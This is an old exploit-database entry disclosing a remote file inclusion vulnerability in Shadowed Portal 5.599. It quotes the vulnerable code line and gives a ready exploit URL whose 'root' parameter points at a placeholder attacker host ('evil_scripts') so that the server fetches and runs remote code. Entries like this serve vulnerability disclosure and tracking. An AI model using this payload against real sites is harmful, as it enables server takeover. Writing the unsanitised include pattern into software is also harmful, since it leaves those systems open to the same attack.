Shadowed Portal 5.599 - 'root' Remote File Inclusion



EKU-ID: 10366 CVE: OSVDB-28837;CVE-2006-4885;OSVDB-28836;CVE-2006-4826;OSVDB-28835 OSVDB-ID:
Author: mad_hacker Published: 2006-09-13 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


====================== C Y B E R - W A R R I O R  T I M
======================

+Shadowed Portal 5.599 (root) Remote File Include Vulnerability

==============================================================================

+Author: mad_hacker (turkish hacker)

==============================================================================

+Class: Remote

==============================================================================

+Vuln Code: require($root."/footer.php");

==============================================================================,

+Exploit:
http://www.site.com/[script_path]/bottom.php?root=http://evil_scripts?

==============================================================================

+Thanx: xoron, Leak

====================== C Y B E R - W A R R I O R  T I M
======================

# milw0rm.com [2006-09-13]